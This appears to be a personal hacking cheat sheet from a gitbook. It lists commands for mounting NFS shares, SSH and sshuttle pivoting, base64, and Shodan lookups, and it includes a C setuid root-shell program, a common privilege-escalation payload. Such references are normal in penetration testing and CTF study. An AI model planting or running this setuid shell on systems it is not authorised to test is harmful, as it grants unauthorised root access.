pirate.moo's gitbook

Handy cmds

Mounting NFS Shares

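mkdir /tmp/foldername # Create a tmp folder to use as the mount point
showmount -e IP # Show the NFS shares exported by IP
mount -t nfs IP:/sharename /tmp/foldername # Mount the share (sharename = an export listed by showmount)
df -h # Check that the share is mounted (df -k shows sizes in 1K blocks)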

SSH:

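ssh-keygen # Generate a key pair
ssh-add key.pem # Add a key to the ssh-agent
ssh -i key.pem user@ip.com # Log in with the authorized key
sshuttle -r user@IP IP # Open sshuttle: route traffic for IP (or a CIDR subnet) through the SSH host
vncviewer IP # Open vncviewer

Base64:

echo yourStatementHere | base64 # Encode
echo eW91clN0YXRlbWVudEhlcmUK | base64 --decode # Decode

C setuid shell:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h> /* declares setuid() */
int main() {
    setuid(0);         /* set the UID to 0 (root); succeeds only with sufficient privilege */
    system("/bin/sh"); /* spawn a shell */
    return 0;
}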

Using API with BASH:

KEY_FILE="${XDG_CONFIG_HOME:-${HOME}/.config}/moo"
ip_addr="$1" # Assumed: the target IP is passed as the first argument

# Check that the key file exists in the expected location, then load it

if [ -f "$KEY_FILE" ]; then
        echo "$KEY_FILE loaded"
        source "$KEY_FILE"
else
        echo "No key file :(" && exit 1
fi

# jq to parse the JSON | tr -d to delete characters | sed to remove square brackets
# Host lookup, cleaned up for reading
curl -s "https://api.shodan.io/shodan/host/${ip_addr}?key=${SHODAN_API_KEY}&query=all" | jq '.' | tr -d '"_{},' | sed 's/[][]//g'
# Search, same cleanup without the bracket removal
curl -s "https://api.shodan.io/shodan/host/search?key=${SHODAN_API_KEY}&query=all:${ip_addr}" | jq '.' | tr -d '"_{},'
# Search, raw JSON
curl -s "https://api.shodan.io/shodan/host/search?key=${SHODAN_API_KEY}&query=all:${ip_addr}"
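A more careful way to load the key used above, as an added example (not from the original page): it reads SHODAN_API_KEY as data instead of sourcing the file, refuses a key file that is group or world accessible, and hands the URL to curl on stdin so the key stays out of the process list. The function names, the KEY=value file layout and the alphanumeric-only key check are assumptions.

```bash
#!/usr/bin/env bash
# Added example: read SHODAN_API_KEY from the key file as data, not via `source`.
# Assumption: the file holds a line of the form SHODAN_API_KEY=value.

load_api_key() {
    local file="$1" mode key
    # Must be a regular file (not a symlink) owned by the current user.
    [ -f "$file" ] && [ ! -L "$file" ] && [ -O "$file" ] || {
        echo "key file missing, a symlink, or not owned by you: $file" >&2; return 1; }
    # Reject any group/other permission bits (characters 5-10 of the ls mode string).
    mode=$(ls -ld "$file" | cut -c5-10)
    [ "$mode" = "------" ] || {
        echo "key file is group/world accessible, run: chmod 600 $file" >&2; return 1; }
    # Extract the value only; nothing in the file is executed.
    key=$(sed -n 's/^SHODAN_API_KEY=//p' "$file" | head -n 1 | tr -d "\"'")
    # Assumption: keys are plain alphanumerics, so anything else is rejected.
    case "$key" in
        ''|*[!A-Za-z0-9]*) echo "no usable SHODAN_API_KEY in $file" >&2; return 1 ;;
    esac
    printf '%s\n' "$key"
}

shodan_host() {
    local ip="$1" key="$2"
    # Pass the URL on stdin (-K -) so the key does not show up in `ps` output.
    printf 'url = "https://api.shodan.io/shodan/host/%s?key=%s"\n' "$ip" "$key" |
        curl -s -K - | jq '.'
}

# Usage (not run here; 198.51.100.7 is a constructed documentation address):
#   key=$(load_api_key "$KEY_FILE") && shodan_host 198.51.100.7 "$key"
```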

Last updated 1 year ago